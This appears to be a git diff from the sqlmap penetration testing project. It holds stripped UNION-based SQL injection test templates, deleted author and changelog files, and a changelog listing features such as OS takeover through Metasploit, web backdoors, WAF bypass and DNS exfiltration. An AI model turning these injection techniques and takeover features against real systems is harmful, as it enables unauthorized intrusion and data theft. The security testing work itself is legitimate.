- Generic UNION query ([CHAR]) - 21 to 30 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [CHAR]
- 21-30
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 21 to 30 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- NULL
- 21-30
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 21 to 30 columns
- 6
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [RANDNUM]
- 21-30
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 31 to 40 columns
- 6
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [CHAR]
- 31-40
-
-
-
-
-
-
-
- Generic UNION query (NULL) - 31 to 40 columns
- 6
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- NULL
- 31-40
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 31 to 40 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [RANDNUM]
- 31-40
-
-
-
-
-
-
-
- Generic UNION query ([CHAR]) - 41 to 50 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [CHAR]
- 41-50
-
-
-
-
-
-
- Generic UNION query (NULL) - 41 to 50 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- NULL
- 41-50
-
-
-
-
-
-
-
- Generic UNION query ([RANDNUM]) - 41 to 50 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- [GENERIC_SQL_COMMENT]
- [RANDNUM]
- 41-50
-
-
-
-
-
-
-
- MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- [COLSTART]-[COLSTOP]
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- [COLSTART]-[COLSTOP]
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 1 to 10 columns
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 1-10
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 1 to 10 columns
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 1-10
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 1 to 10 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 1-10
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 11 to 20 columns
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 11-20
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 11 to 20 columns
- 6
- 2
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 11-20
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 11 to 20 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 11-20
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 21 to 30 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 21-30
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 21 to 30 columns
- 6
- 3
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 21-30
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 21 to 30 columns
- 6
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 21-30
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 31 to 40 columns
- 6
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 31-40
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 31 to 40 columns
- 6
- 4
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 31-40
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 31 to 40 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 31-40
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([CHAR]) - 41 to 50 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [CHAR]
- 41-50
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query (NULL) - 41 to 50 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- NULL
- 41-50
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL UNION query ([RANDNUM]) - 41 to 50 columns
- 6
- 5
- 1
- 1,2,3,4,5
- 1
- [UNION]
-
-
- #
- [RANDNUM]
- 41-50
-
-
-
-
-
- MySQL
-
-
-
-
diff --git a/data/xml/queries.xml b/data/xml/queries.xml
deleted file mode 100644
index 37a4b0c2a6e..00000000000
--- a/data/xml/queries.xml
+++ /dev/null
@@ -1,1788 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- />
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/doc/AUTHORS b/doc/AUTHORS
deleted file mode 100644
index d3758d676d3..00000000000
--- a/doc/AUTHORS
+++ /dev/null
@@ -1,7 +0,0 @@
-Bernardo Damele Assumpcao Guimaraes (@inquisb)
-
-
-Miroslav Stampar (@stamparm)
-
-
-You can contact both developers by writing to dev@sqlmap.org
diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md
deleted file mode 100644
index 5eab5958460..00000000000
--- a/doc/CHANGELOG.md
+++ /dev/null
@@ -1,413 +0,0 @@
-# Version 1.9 (2025-01-02)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.8...1.9)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/10?closed=1)
-
-# Version 1.8 (2024-01-03)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.7...1.8)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/9?closed=1)
-
-# Version 1.7 (2023-01-02)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
-
-# Version 1.6 (2022-01-03)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/7?closed=1)
-
-# Version 1.5 (2021-01-03)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.4...1.5)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/6?closed=1)
-
-# Version 1.4 (2020-01-01)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)
-
-# Version 1.3 (2019-01-05)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/4?closed=1)
-
-# Version 1.2 (2018-01-08)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/3?closed=1)
-
-# Version 1.1 (2017-04-07)
-
-* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
-* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/2?closed=1)
-
-# Version 1.0 (2016-02-27)
-
-* Implemented support for automatic decoding of page content through detected charset.
-* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
-* Major improvements to program stabilization based on user reports.
-* Added new tampering scripts avoiding popular WAF/IPS mechanisms.
-* Fixed major bug with DNS leaking in Tor mode.
-* Added wordlist compilation made of the most popular cracking dictionaries.
-* Implemented multi-processor hash cracking routine(s).
-* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
-* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
-* Substantial code optimization and smaller memory footprint.
-* Added option `-m` for scanning multiple targets enlisted in a given textual file.
-* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
-* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
-* Added option `--host` for manually setting HTTP Host header value.
-* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
-* Added option `--skip` for skipping tests for given parameter(s).
-* Added switch `--titles` for comparing pages based only on their titles.
-* Added option `--charset` for forcing character encoding used for data retrieval.
-* Added switch `--check-tor` for checking if Tor is used properly.
-* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
-* Added option `--csv-del` for manually setting delimiting character used in CSV output.
-* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
-* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
-* Added switch `--check-waf` for checking of existence of WAF/IPS protection.
-* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
-* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
-* Major improvements to switches `--tables` and `--columns`.
-* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
-* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
-* Added switch `-a` to enumerate all DBMS data.
-* Added option `--alert` to run host OS command(s) when SQL injection is found.
-* Added option `--answers` to set user answers to asked questions during sqlmap run.
-* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
-* Added option `--charset` to force character encoding used during data retrieval.
-* Added switch `--check-tor` to force checking of proper usage of Tor.
-* Added option `--code` to set HTTP code to match when query is evaluated to True.
-* Added option `--cookie-del` to set character to be used while splitting cookie values.
-* Added option `--crawl` to set the crawling depth for the website starting from the target URL.
-* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
-* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
-* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
-* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
-* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
-* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
-* Added switch `--disable-coloring` to disable console output coloring.
-* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
-* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
-* Added option `--eval` for setting the Python code that will be evaluated before the request.
-* Added switch `--force-ssl` to force usage of SSL/HTTPS.
-* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
-* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
-* Added switch `-hh` for showing advanced help message.
-* Added option `--host` to set the HTTP Host header value.
-* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
-* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
-* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS protection.
-* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
-* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
-* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
-* Added switch `--invalid-string` for usage of random strings while invalidating values.
-* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
-* Added option `-m` to set the textual file holding multiple targets for scanning purposes.
-* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
-* Added switch `--no-cast` for turning off payload casting mechanism.
-* Added switch `--no-escape` for turning off string escaping mechanism.
-* Added option `--not-string` for setting string to be matched when query is evaluated to False.
-* Added switch `--offline` to force work in offline mode (i.e. only use session data).
-* Added option `--output-dir` to set custom output directory path.
-* Added option `--param-del` to set character used for splitting parameter values.
-* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
-* Added option `--proxy-file` to set file holding proxy list.
-* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
-* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
-* Added option `--safe-post` to set POST data for sending to safe URL.
-* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
-* Added option `--skip` to skip testing of given parameter(s).
-* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
-* Added switch `--skip-urlencode` to skip URL encoding of payload data.
-* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS protection.
-* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
-* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
-* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
-* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
-* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).
-* Added switch `--titles` to turn on comparison of pages based only on their titles.
-* Added option `--tor-port` to explicitly set Tor proxy port.
-* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
-* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
-* Added option `--where` to set `WHERE` condition to be used during the table dumping.
-* Added option `-X` to exclude DBMS database table column(s) from enumeration.
-* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
-* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
-
-# Version 0.9 (2011-04-10)
-
-* Rewritten SQL injection detection engine.
-* Support to directly connect to the database without passing via a SQL injection, option `-d`.
-* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
-* Implemented support for SQLite 2 and 3.
-* Implemented support for Firebird.
-* Implemented support for Microsoft Access, Sybase and SAP MaxDB.
-* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
-* Added support to tamper injection data with option `--tamper`.
-* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
-* Added support to enumerate roles on Oracle, `--roles` switch.
-* Added support for SOAP based web services requests.
-* Added support to fetch unicode data.
-* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
-* Implemented several optimization switches to speed up the exploitation of SQL injections.
-* Support to test and inject against HTTP Referer header.
-* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
-* Implemented feature to speedup the enumeration of table names.
-* Support for customizable HTTP(s) redirections.
-* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
-* Support to parse and test forms on target url, switch `--forms`.
-* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
-* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
-* Added safe URL feature, `--safe-url` and `--safe-freq`.
-* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
-* Implemented few other features and switches.
-* Over 100 bugs fixed.
-* Major code refactoring.
-* User's manual updated.
-
-# Version 0.8 (2010-03-14)
-
-* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
-* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
-* Support for takeover features on PostgreSQL 8.4.
-* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
-* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
-* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
-* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
-* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
-* Updated active fingerprint for PostgreSQL 8.4.
-* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
-* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
-* Support for Certificate authentication, `--auth-cert` option added.
-* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
-* Added option `-r` to load a single HTTP request from a text file.
-* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
-* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
-* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
-* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
-* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
-* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
-* Major bugs fixed.
-* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
-* Major code cleanup.
-* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
-* Updated user's manual.
-* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html.
-
-# Version 0.8 release candidate (2009-09-21)
-
-* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
-* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
-* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
-* Added options for MySQL and PostgreSQL to inject custom user-defined functions.
-* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
-* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
-* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
-* Minor bugs fixed.
-* Major code refactoring.
-
-# Version 0.7 (2009-07-25)
-
-* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
-* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
-* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
-* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
-* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
-* Major bug fix to sql-query/sql-shell features.
-* Major bug fix in `--read-file` option.
-* Major silent bug fix to multi-threading functionality.
-* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
-* Fixed MySQL 'comment injection' version fingerprint.
-* Fixed basic Microsoft SQL Server 2000 fingerprint.
-* Many minor bug fixes and code refactoring.
-
-# Version 0.7 release candidate (2009-04-22)
-
-* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
-* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
-* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
-* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
-* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
-* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
-* Speed up the inference algorithm by providing the minimum required charset for the query output;
-* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
-* Many minor bug fixes, minor enhancements and layout adjustments.
-
-# Version 0.6.4 (2009-02-03)
-
-* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
-* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
-* Major speed increase in DBMS basic fingerprint;
-* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
-* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
-* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
-* Minor layout adjustment to the `--update` output;
-* Increased default timeout to 30 seconds;
-* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
-* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
-* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
-* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
-* Updated documentation.
-
-# Version 0.6.3 (2008-12-18)
-
-* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ;
-* Major enhancement to support Partial UNION query SQL injection technique too;
-* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
-* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
-* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
